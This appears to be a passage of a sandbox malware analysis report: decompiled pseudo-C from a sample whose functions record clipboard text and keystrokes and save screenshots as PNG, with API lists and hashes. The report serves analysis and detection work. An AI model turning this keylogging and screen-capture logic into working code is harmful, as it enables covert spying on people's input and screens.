                                                                                                                                      							 *(_t103 - 4) = 1;
                                                                                                                                      							_t41 = E0130757A(_t103 - 0x84, _t103 + 0x30,  *_t15);
                                                                                                                                      							 *(_t103 - 4) = 2;
                                                                                                                                      							_t43 = E01302390(_t103 - 0x6c);
                                                                                                                                      							 *(_t103 - 4) = 3;
                                                                                                                                      							_t44 = E0130757A(_t103 - 0x54, _t103 + 0x48, __eflags);
                                                                                                                                      							 *(_t103 - 4) = 4;
                                                                                                                                      							_t45 = E0130333B(_t44, _t43);
                                                                                                                                      							 *(_t103 - 4) = 5;
                                                                                                                                      							_t93 = _t45;
                                                                                                                                      							E0130333B(_t45, _t41);
                                                                                                                                      							E013017EF(_t62, _t45, _t41, _t43, __eflags);
                                                                                                                                      							E01302755(_t103 - 0x3c, _t45, __eflags);
                                                                                                                                      							E01302755(_t103 - 0x54, _t93, __eflags);
                                                                                                                                      							E01302755(_t103 - 0x6c, _t93, __eflags);
                                                                                                                                      							E01302755(_t103 - 0x84, _t93, __eflags);
                                                                                                                                      							E013028AF(_t103 + 0x48, _t93, __eflags);
                                                                                                                                      							_t80 = _t103 + 0x30;
                                                                                                                                      							goto L7;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						if( *((intOrPtr*)(_t62 + 0x54)) != 0xa2) {
                                                                                                                                      							_t116 =  *((intOrPtr*)(_t62 + 0x54)) - 0xa3;
                                                                                                                                      							if( *((intOrPtr*)(_t62 + 0x54)) != 0xa3) {
                                                                                                                                      								_t53 = E01302917(_t103 - 0x24, _t89, "]");
                                                                                                                                      								 *(_t103 - 4) = 6;
                                                                                                                                      								_t54 = E01302917(_t103, _t89, "[Ctrl+");
                                                                                                                                      								 *(_t103 - 4) = 7;
                                                                                                                                      								_t56 = E013033D2(_t62, _t103 + 0x18, _t54, E0130E320( *((intOrPtr*)(_t62 + 0x54))));
                                                                                                                                      								 *(_t103 - 4) = 8;
                                                                                                                                      								_t93 = _t56;
                                                                                                                                      								E013033FE(_t56, _t53);
                                                                                                                                      								E013017B2(_t62, _t56, _t53, _t116);
                                                                                                                                      								E013028AF(_t103 + 0x18, _t56, _t116);
                                                                                                                                      								E013028AF(_t103, _t93, _t116);
                                                                                                                                      								_t80 = _t103 - 0x24;
                                                                                                                                      								L7:
                                                                                                                                      								_t37 = E013028AF(_t80, _t93, _t116);
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
                                                                                                                                      				return _t37;
                                                                                                                                      			}























                                                                                                                                      0x01302134
                                                                                                                                      0x01302134
                                                                                                                                      0x0130213d
                                                                                                                                      0x01302142
                                                                                                                                      0x01302146
                                                                                                                                      0x01302148
                                                                                                                                      0x01302149
                                                                                                                                      0x0130214e
                                                                                                                                      0x013022a0
                                                                                                                                      0x013022a7
                                                                                                                                      0x01302154
                                                                                                                                      0x01302158
                                                                                                                                      0x013021e5
                                                                                                                                      0x013021e9
                                                                                                                                      0x013021f7
                                                                                                                                      0x013021fc
                                                                                                                                      0x013021fc
                                                                                                                                      0x013021fc
                                                                                                                                      0x01302208
                                                                                                                                      0x01302210
                                                                                                                                      0x0130221a
                                                                                                                                      0x01302224
                                                                                                                                      0x01302229
                                                                                                                                      0x01302233
                                                                                                                                      0x0130223a
                                                                                                                                      0x01302242
                                                                                                                                      0x01302249
                                                                                                                                      0x01302251
                                                                                                                                      0x01302257
                                                                                                                                      0x0130225a
                                                                                                                                      0x01302262
                                                                                                                                      0x0130226a
                                                                                                                                      0x01302272
                                                                                                                                      0x0130227a
                                                                                                                                      0x01302285
                                                                                                                                      0x0130228d
                                                                                                                                      0x01302292
                                                                                                                                      0x00000000
                                                                                                                                      0x01302292
                                                                                                                                      0x0130215e
                                                                                                                                      0x01302165
                                                                                                                                      0x0130216b
                                                                                                                                      0x01302172
                                                                                                                                      0x01302180
                                                                                                                                      0x0130218f
                                                                                                                                      0x01302196
                                                                                                                                      0x0130219d
                                                                                                                                      0x013021af
                                                                                                                                      0x013021b7
                                                                                                                                      0x013021bd
                                                                                                                                      0x013021c0
                                                                                                                                      0x013021c8
                                                                                                                                      0x013021d0
                                                                                                                                      0x013021d8
                                                                                                                                      0x013021dd
                                                                                                                                      0x01302295
                                                                                                                                      0x01302295
                                                                                                                                      0x01302295
                                                                                                                                      0x01302172
                                                                                                                                      0x01302165
                                                                                                                                      0x01302158
                                                                                                                                      0x013022b1
                                                                                                                                      0x013022bd

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 0130213D
                                                                                                                                        • Part of subcall function 013017B2: __EH_prolog.LIBCMT ref: 013017B7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog
                                                                                                                                      • String ID: [Clipboard End]$[Ctrl+$[Ctrl+V][Text Pasted From Clipboard]
                                                                                                                                      • API String ID: 3519838083-2271711481
                                                                                                                                      • Opcode ID: 0d8c39138820a8388a7b97eb12e6cc00db8dd458cdb6e993353bc4a9234b03d5
                                                                                                                                      • Instruction ID: b53a70e9f046eba6fc49e713bc20dfa9e1752b28e9ccd7466e94811461381ca6
                                                                                                                                      • Opcode Fuzzy Hash: 0d8c39138820a8388a7b97eb12e6cc00db8dd458cdb6e993353bc4a9234b03d5
                                                                                                                                      • Instruction Fuzzy Hash: 5C4160309002599BDB0AFB6CC9A9BEE7BF4AF34608F5040A8D402571D5EF74AB49C791
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                      			E013023CA(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				intOrPtr _t28;
                                                                                                                                      				void* _t32;
                                                                                                                                      				void* _t35;
                                                                                                                                      				void* _t38;
                                                                                                                                      				void* _t39;
                                                                                                                                      				void* _t40;
                                                                                                                                      				void* _t55;
                                                                                                                                      				void* _t85;
                                                                                                                                      				void* _t91;
                                                                                                                                      
                                                                                                                                      				_t55 = __ecx;
                                                                                                                                      				E01323174(E0132331B, __edx, __eflags);
                                                                                                                                      				_t28 =  *0x132faf4; // 0x80000002
                                                                                                                                      				_t85 = _t55;
                                                                                                                                      				if(_t28 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                                                                                                                                      					E01309873(_t28, 0x132faf4);
                                                                                                                                      					_t100 =  *0x132faf4 - 0xffffffff;
                                                                                                                                      					if( *0x132faf4 == 0xffffffff) {
                                                                                                                                      						E01302801(0x132faf8);
                                                                                                                                      						E01309BFF(_t100, E0132395F);
                                                                                                                                      						E01309829(0x132faf4);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				E01302390(_t91 + 0x48);
                                                                                                                                      				 *(_t91 - 4) =  *(_t91 - 4) & 0x00000000;
                                                                                                                                      				_t80 = 0x132faf8;
                                                                                                                                      				if(E0130330C(0x132faf8) == 0) {
                                                                                                                                      					E01302728(0x132faf8, _t91 + 0x48);
                                                                                                                                      					_t35 = E01303300();
                                                                                                                                      					_t102 = _t35;
                                                                                                                                      					if(_t35 != 0) {
                                                                                                                                      						E01302917(_t91 + 0x18, 0x132faf8, "\r\n[Clipboard End]\r\n");
                                                                                                                                      						 *(_t91 - 4) = 1;
                                                                                                                                      						E01302917(_t91 + 0x30, 0x132faf8, "\r\n[Text copied to clipboard]\r\n");
                                                                                                                                      						 *(_t91 - 4) = 2;
                                                                                                                                      						_t38 = E0130757A(_t91 - 0x3c, _t91 + 0x18, _t102);
                                                                                                                                      						 *(_t91 - 4) = 3;
                                                                                                                                      						_t39 = E0130757A(_t91 - 0x24, _t91 + 0x30, _t102);
                                                                                                                                      						 *(_t91 - 4) = 4;
                                                                                                                                      						_t40 = E013033AA(_t91, _t39, _t85, _t102, 0x132faf8);
                                                                                                                                      						 *(_t91 - 4) = 5;
                                                                                                                                      						_t80 = _t40;
                                                                                                                                      						E0130333B(_t40, _t38);
                                                                                                                                      						E013017EF(_t85, _t40, _t85, _t38, _t102);
                                                                                                                                      						E01302755(_t91, _t40, _t102);
                                                                                                                                      						E01302755(_t91 - 0x24, _t80, _t102);
                                                                                                                                      						E01302755(_t91 - 0x3c, _t80, _t102);
                                                                                                                                      						E013028AF(_t91 + 0x30, _t80, _t102);
                                                                                                                                      						E013028AF(_t91 + 0x18, _t80, _t102);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t32 = E01302755(_t91 + 0x48, _t80, _t102);
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                                                                                                                                      				return _t32;
                                                                                                                                      			}















                                                                                                                                      0x013023ca
                                                                                                                                      0x013023d3
                                                                                                                                      0x013023e3
                                                                                                                                      0x013023f0
                                                                                                                                      0x013023f8
                                                                                                                                      0x01302400
                                                                                                                                      0x01302405
                                                                                                                                      0x0130240d
                                                                                                                                      0x01302411
                                                                                                                                      0x0130241b
                                                                                                                                      0x01302421
                                                                                                                                      0x01302427
                                                                                                                                      0x0130240d
                                                                                                                                      0x0130242c
                                                                                                                                      0x01302431
                                                                                                                                      0x01302438
                                                                                                                                      0x01302441
                                                                                                                                      0x0130244d
                                                                                                                                      0x01302455
                                                                                                                                      0x0130245a
                                                                                                                                      0x0130245c
                                                                                                                                      0x0130246a
                                                                                                                                      0x01302477
                                                                                                                                      0x0130247b
                                                                                                                                      0x01302483
                                                                                                                                      0x0130248a
                                                                                                                                      0x01302494
                                                                                                                                      0x0130249b
                                                                                                                                      0x013024a3
                                                                                                                                      0x013024aa
                                                                                                                                      0x013024b2
                                                                                                                                      0x013024b8
                                                                                                                                      0x013024bb
                                                                                                                                      0x013024c3
                                                                                                                                      0x013024cb
                                                                                                                                      0x013024d3
                                                                                                                                      0x013024db
                                                                                                                                      0x013024e3
                                                                                                                                      0x013024eb
                                                                                                                                      0x013024eb
                                                                                                                                      0x0130245c
                                                                                                                                      0x013024f3
                                                                                                                                      0x013024fd
                                                                                                                                      0x01302509

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 013023D3
                                                                                                                                        • Part of subcall function 01309873: EnterCriticalSection.KERNEL32(0132EAA8,?,0000EA60,?,01301B47,0132FAD8,00000001,00000000), ref: 0130987E
                                                                                                                                        • Part of subcall function 01309873: LeaveCriticalSection.KERNEL32(0132EAA8,?,0000EA60,?,01301B47,0132FAD8,00000001,00000000), ref: 013098BB
                                                                                                                                        • Part of subcall function 01309BFF: __onexit.LIBCMT ref: 01309C05
                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 01302421
                                                                                                                                        • Part of subcall function 01309829: EnterCriticalSection.KERNEL32(0132EAA8,0000EA60,?,01301B71,01323955,00000001,00000000), ref: 01309833
                                                                                                                                        • Part of subcall function 01309829: LeaveCriticalSection.KERNEL32(0132EAA8,?,01301B71,01323955,00000001,00000000), ref: 01309866
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection$EnterLeave$H_prologInit_thread_footer__onexit
                                                                                                                                      • String ID: [Clipboard End]$[Text copied to clipboard]
                                                                                                                                      • API String ID: 3775875586-3307016251
                                                                                                                                      • Opcode ID: 13c4206e1e7f370e9041a9d2a33f6e49daea3f3d3574aa48db56f1ad3a4904ca
                                                                                                                                      • Instruction ID: bc3eff1aeed8365b307a5e398b8c6f37538b830300cde8bdf6afeba4c56b5e6c
                                                                                                                                      • Opcode Fuzzy Hash: 13c4206e1e7f370e9041a9d2a33f6e49daea3f3d3574aa48db56f1ad3a4904ca
                                                                                                                                      • Instruction Fuzzy Hash: 0B31D2309002469BDB0AFB6CD8A4AEE77E4AF3425CF504068E801572C1EF75AA09C791
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                      			E01306984(void* __ecx, signed int __edx, void* __edi, void* __eflags) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t23;
                                                                                                                                      				intOrPtr* _t29;
                                                                                                                                      				void* _t39;
                                                                                                                                      				void* _t40;
                                                                                                                                      				void* _t43;
                                                                                                                                      				void* _t47;
                                                                                                                                      				void* _t50;
                                                                                                                                      				signed int _t59;
                                                                                                                                      				void* _t64;
                                                                                                                                      				intOrPtr* _t65;
                                                                                                                                      				void* _t67;
                                                                                                                                      
                                                                                                                                      				_t59 = __edx;
                                                                                                                                      				_t43 = __ecx;
                                                                                                                                      				E01323174(E013236CF, __edx, __eflags);
                                                                                                                                      				_t23 = E013027E1(_t67 - 0x78, _t59, _t43);
                                                                                                                                      				_t2 = _t67 - 4;
                                                                                                                                      				 *_t2 =  *(_t67 - 4) & 0x00000000;
                                                                                                                                      				_t73 =  *_t2;
                                                                                                                                      				E013031AE(_t67 - 0x60, _t23, __edi, L"png");
                                                                                                                                      				_t47 = _t67 - 0x78;
                                                                                                                                      				 *(_t67 - 4) = 2;
                                                                                                                                      				E01302755(_t47, _t23,  *_t2);
                                                                                                                                      				E01306561(_t67 - 0x48, _t59,  *_t2);
                                                                                                                                      				_t50 = _t67 - 0x48;
                                                                                                                                      				 *(_t67 - 4) = 3;
                                                                                                                                      				_t29 =  *0x132f8dc(E0130282E(_t50,  *_t2), E01302709(), _t47, _t64, _t40);
                                                                                                                                      				_t65 = _t29;
                                                                                                                                      				E013062DA(_t67 - 0x20, _t65);
                                                                                                                                      				 *(_t67 - 4) = 4;
                                                                                                                                      				E013068F2(L"image/png", _t67 - 0x30, _t65);
                                                                                                                                      				E0130634D(E01302712(_t67 - 0x60,  *_t2), _t67 - 0x20, _t33, _t67 - 0x30, 0);
                                                                                                                                      				E013062FD( *((intOrPtr*)( *_t65 + 8))(_t65, _t50), _t67 - 0x20);
                                                                                                                                      				E013028AF(_t67 - 0x48, _t67 - 0x30, _t73);
                                                                                                                                      				_t39 = E01302755(_t67 - 0x60, _t67 - 0x30, _t73);
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
                                                                                                                                      				return _t39;
                                                                                                                                      			}















                                                                                                                                      0x01306984
                                                                                                                                      0x01306984
                                                                                                                                      0x01306989
                                                                                                                                      0x01306999
                                                                                                                                      0x0130699e
                                                                                                                                      0x0130699e
                                                                                                                                      0x0130699e
                                                                                                                                      0x013069ac
                                                                                                                                      0x013069b2
                                                                                                                                      0x013069b5
                                                                                                                                      0x013069b9
                                                                                                                                      0x013069c4
                                                                                                                                      0x013069ca
                                                                                                                                      0x013069cd
                                                                                                                                      0x013069dd
                                                                                                                                      0x013069e4
                                                                                                                                      0x013069ea
                                                                                                                                      0x013069f2
                                                                                                                                      0x013069fb
                                                                                                                                      0x01306a12
                                                                                                                                      0x01306a20
                                                                                                                                      0x01306a28
                                                                                                                                      0x01306a30
                                                                                                                                      0x01306a39
                                                                                                                                      0x01306a42

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01306989
                                                                                                                                        • Part of subcall function 01306561: __EH_prolog.LIBCMT ref: 01306566
                                                                                                                                        • Part of subcall function 01306561: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01306589
                                                                                                                                        • Part of subcall function 01306561: CreateCompatibleDC.GDI32(00000000), ref: 01306595
                                                                                                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,00000000), ref: 013069DD
                                                                                                                                        • Part of subcall function 013062DA: GdipLoadImageFromStream.GDIPLUS(?,?,00000000,013069EF,00000000,?,?,?,00000000), ref: 013062EE
                                                                                                                                        • Part of subcall function 0130634D: GdipSaveImageToFile.GDIPLUS(?,?,?,?,00000000,01306A17,00000000,?,00000000,00000000,?,?,?,00000000), ref: 0130635F
                                                                                                                                        • Part of subcall function 013062FD: GdipDisposeImage.GDIPLUS(?,01306A25,?,?,?,00000000), ref: 01306306
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateGdipImage$H_prologStream$CompatibleDisposeFileFromLoadSave
                                                                                                                                      • String ID: image/png$png
                                                                                                                                      • API String ID: 1779936357-44166789
                                                                                                                                      • Opcode ID: a4237f84d80c5a02d77965f667100203b007b2c0e8bf7e73f9a4b8067bfb39db
                                                                                                                                      • Instruction ID: 25c5c3a60284404c0cd4244f06e0e83e2a36705f6cab0263a66e1ee25f48747c
                                                                                                                                      • Opcode Fuzzy Hash: a4237f84d80c5a02d77965f667100203b007b2c0e8bf7e73f9a4b8067bfb39db
                                                                                                                                      • Instruction Fuzzy Hash: 76114575814169DADB06FBA8C8A9EDEB7B8BF39208F14411DE102671D1DF745A09C760
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                      			E0131582D(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				signed int _v12;
                                                                                                                                      				signed int _v16;
                                                                                                                                      				unsigned int _v20;
                                                                                                                                      				signed int _v28;
                                                                                                                                      				signed int _v32;
                                                                                                                                      				signed int _v36;
                                                                                                                                      				char _v40;
                                                                                                                                      				intOrPtr _v48;
                                                                                                                                      				char _v52;
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* _t86;
                                                                                                                                      				signed int _t92;
                                                                                                                                      				signed int _t93;
                                                                                                                                      				signed int _t94;
                                                                                                                                      				signed int _t100;
                                                                                                                                      				void* _t101;
                                                                                                                                      				void* _t102;
                                                                                                                                      				void* _t104;
                                                                                                                                      				void* _t107;
                                                                                                                                      				void* _t109;
                                                                                                                                      				void* _t111;
                                                                                                                                      				void* _t115;
                                                                                                                                      				char* _t116;
                                                                                                                                      				void* _t119;
                                                                                                                                      				signed int _t121;
                                                                                                                                      				signed int _t128;
                                                                                                                                      				signed int* _t129;
                                                                                                                                      				signed int _t136;
                                                                                                                                      				signed int _t137;
                                                                                                                                      				char _t138;
                                                                                                                                      				signed int _t139;
                                                                                                                                      				signed int _t142;
                                                                                                                                      				signed int _t146;
                                                                                                                                      				signed int _t151;
                                                                                                                                      				char _t156;
                                                                                                                                      				char _t157;
                                                                                                                                      				void* _t161;
                                                                                                                                      				unsigned int _t162;
                                                                                                                                      				signed int _t164;
                                                                                                                                      				signed int _t166;
                                                                                                                                      				signed int _t170;
                                                                                                                                      				void* _t171;
                                                                                                                                      				signed int* _t172;
                                                                                                                                      				signed int _t174;
                                                                                                                                      				signed int _t181;
                                                                                                                                      				signed int _t182;
                                                                                                                                      				signed int _t183;
                                                                                                                                      				signed int _t184;
                                                                                                                                      				signed int _t185;
                                                                                                                                      				signed int _t186;
                                                                                                                                      				signed int _t187;
                                                                                                                                      
                                                                                                                                      				_t171 = __edx;
                                                                                                                                      				_t181 = _a24;
                                                                                                                                      				if(_t181 < 0) {
                                                                                                                                      					_t181 = 0;
                                                                                                                                      				}
                                                                                                                                      				_t184 = _a8;
                                                                                                                                      				 *_t184 = 0;
                                                                                                                                      				E0130E1A2(0,  &_v52, _t171, _a36);
                                                                                                                                      				_t5 = _t181 + 0xb; // 0xb
                                                                                                                                      				if(_a12 > _t5) {
                                                                                                                                      					_t172 = _a4;
                                                                                                                                      					_t142 = _t172[1];
                                                                                                                                      					_v36 =  *_t172;
                                                                                                                                      					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                                                                                                      					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                                                                                                      						L11:
                                                                                                                                      						__eflags = _t142 & 0x80000000;
                                                                                                                                      						if((_t142 & 0x80000000) != 0) {
                                                                                                                                      							 *_t184 = 0x2d;
                                                                                                                                      							_t184 = _t184 + 1;
                                                                                                                                      							__eflags = _t184;
                                                                                                                                      						}
                                                                                                                                      						__eflags = _a28;
                                                                                                                                      						_v16 = 0x3ff;
                                                                                                                                      						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                                                                                                      						__eflags = _t172[1] & 0x7ff00000;
                                                                                                                                      						_v32 = _t136;
                                                                                                                                      						_t86 = 0x30;
                                                                                                                                      						if((_t172[1] & 0x7ff00000) != 0) {
                                                                                                                                      							 *_t184 = 0x31;
                                                                                                                                      							_t185 = _t184 + 1;
                                                                                                                                      							__eflags = _t185;
                                                                                                                                      						} else {
                                                                                                                                      							 *_t184 = _t86;
                                                                                                                                      							_t185 = _t184 + 1;
                                                                                                                                      							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                                                                                                      							__eflags = _t164;
                                                                                                                                      							if(_t164 != 0) {
                                                                                                                                      								_v16 = 0x3fe;
                                                                                                                                      							} else {
                                                                                                                                      								_v16 = _v16 & _t164;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						_t146 = _t185;
                                                                                                                                      						_t186 = _t185 + 1;
                                                                                                                                      						_v28 = _t146;
                                                                                                                                      						__eflags = _t181;
                                                                                                                                      						if(_t181 != 0) {
                                                                                                                                      							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
                                                                                                                                      						} else {
                                                                                                                                      							 *_t146 = 0;
                                                                                                                                      						}
                                                                                                                                      						_t92 = _t172[1] & 0x000fffff;
                                                                                                                                      						__eflags = _t92;
                                                                                                                                      						_v20 = _t92;
                                                                                                                                      						if(_t92 > 0) {
                                                                                                                                      							L23:
                                                                                                                                      							_t33 =  &_v8;
                                                                                                                                      							 *_t33 = _v8 & 0x00000000;
                                                                                                                                      							__eflags =  *_t33;
                                                                                                                                      							_t147 = 0xf0000;
                                                                                                                                      							_t93 = 0x30;
                                                                                                                                      							_v12 = _t93;
                                                                                                                                      							_v20 = 0xf0000;
                                                                                                                                      							do {
                                                                                                                                      								__eflags = _t181;
                                                                                                                                      								if(_t181 <= 0) {
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								_t119 = E01322D10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                                                                                      								_t161 = 0x30;
                                                                                                                                      								_t121 = _t119 + _t161 & 0x0000ffff;
                                                                                                                                      								__eflags = _t121 - 0x39;
                                                                                                                                      								if(_t121 > 0x39) {
                                                                                                                                      									_t121 = _t121 + _t136;
                                                                                                                                      									__eflags = _t121;
                                                                                                                                      								}
                                                                                                                                      								_t162 = _v20;
                                                                                                                                      								_t172 = _a4;
                                                                                                                                      								 *_t186 = _t121;
                                                                                                                                      								_t186 = _t186 + 1;
                                                                                                                                      								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                                                                                                      								_t147 = _t162 >> 4;
                                                                                                                                      								_t93 = _v12 - 4;
                                                                                                                                      								_t181 = _t181 - 1;
                                                                                                                                      								_v20 = _t162 >> 4;
                                                                                                                                      								_v12 = _t93;
                                                                                                                                      								__eflags = _t93;
                                                                                                                                      							} while (_t93 >= 0);
                                                                                                                                      							__eflags = _t93;
                                                                                                                                      							if(_t93 < 0) {
                                                                                                                                      								goto L39;
                                                                                                                                      							}
                                                                                                                                      							_t115 = E01322D10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                                                                                      							__eflags = _t115 - 8;
                                                                                                                                      							if(_t115 <= 8) {
                                                                                                                                      								goto L39;
                                                                                                                                      							}
                                                                                                                                      							_t54 = _t186 - 1; // 0x130fdf6
                                                                                                                                      							_t116 = _t54;
                                                                                                                                      							_t138 = 0x30;
                                                                                                                                      							while(1) {
                                                                                                                                      								_t156 =  *_t116;
                                                                                                                                      								__eflags = _t156 - 0x66;
                                                                                                                                      								if(_t156 == 0x66) {
                                                                                                                                      									goto L33;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _t156 - 0x46;
                                                                                                                                      								if(_t156 != 0x46) {
                                                                                                                                      									_t139 = _v32;
                                                                                                                                      									__eflags = _t116 - _v28;
                                                                                                                                      									if(_t116 == _v28) {
                                                                                                                                      										_t57 = _t116 - 1;
                                                                                                                                      										 *_t57 =  *(_t116 - 1) + 1;
                                                                                                                                      										__eflags =  *_t57;
                                                                                                                                      									} else {
                                                                                                                                      										_t157 =  *_t116;
                                                                                                                                      										__eflags = _t157 - 0x39;
                                                                                                                                      										if(_t157 != 0x39) {
                                                                                                                                      											 *_t116 = _t157 + 1;
                                                                                                                                      										} else {
                                                                                                                                      											 *_t116 = _t139 + 0x3a;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									goto L39;
                                                                                                                                      								}
                                                                                                                                      								L33:
                                                                                                                                      								 *_t116 = _t138;
                                                                                                                                      								_t116 = _t116 - 1;
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							__eflags =  *_t172;
                                                                                                                                      							if( *_t172 <= 0) {
                                                                                                                                      								L39:
                                                                                                                                      								__eflags = _t181;
                                                                                                                                      								if(_t181 > 0) {
                                                                                                                                      									_push(_t181);
                                                                                                                                      									_t111 = 0x30;
                                                                                                                                      									_push(_t111);
                                                                                                                                      									_push(_t186);
                                                                                                                                      									E0130C510(_t181);
                                                                                                                                      									_t186 = _t186 + _t181;
                                                                                                                                      									__eflags = _t186;
                                                                                                                                      								}
                                                                                                                                      								_t94 = _v28;
                                                                                                                                      								__eflags =  *_t94;
                                                                                                                                      								if( *_t94 == 0) {
                                                                                                                                      									_t186 = _t94;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _a28;
                                                                                                                                      								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                                                                                      								_t174 = _a4[1];
                                                                                                                                      								_t100 = E01322D10( *_a4, 0x34, _t174);
                                                                                                                                      								_t137 = 0;
                                                                                                                                      								_t151 = (_t100 & 0x000007ff) - _v16;
                                                                                                                                      								__eflags = _t151;
                                                                                                                                      								asm("sbb ebx, ebx");
                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                      									L47:
                                                                                                                                      									 *(_t186 + 1) = 0x2d;
                                                                                                                                      									_t187 = _t186 + 2;
                                                                                                                                      									__eflags = _t187;
                                                                                                                                      									_t151 =  ~_t151;
                                                                                                                                      									asm("adc ebx, 0x0");
                                                                                                                                      									_t137 =  ~_t137;
                                                                                                                                      									goto L48;
                                                                                                                                      								} else {
                                                                                                                                      									if(__eflags > 0) {
                                                                                                                                      										L46:
                                                                                                                                      										 *(_t186 + 1) = 0x2b;
                                                                                                                                      										_t187 = _t186 + 2;
                                                                                                                                      										L48:
                                                                                                                                      										_t182 = _t187;
                                                                                                                                      										_t101 = 0x30;
                                                                                                                                      										 *_t187 = _t101;
                                                                                                                                      										__eflags = _t137;
                                                                                                                                      										if(__eflags < 0) {
                                                                                                                                      											L56:
                                                                                                                                      											__eflags = _t187 - _t182;
                                                                                                                                      											if(_t187 != _t182) {
                                                                                                                                      												L60:
                                                                                                                                      												_push(0);
                                                                                                                                      												_push(0xa);
                                                                                                                                      												_push(_t137);
                                                                                                                                      												_push(_t151);
                                                                                                                                      												_t102 = E01322A30();
                                                                                                                                      												_v32 = _t174;
                                                                                                                                      												 *_t187 = _t102 + 0x30;
                                                                                                                                      												_t187 = _t187 + 1;
                                                                                                                                      												__eflags = _t187;
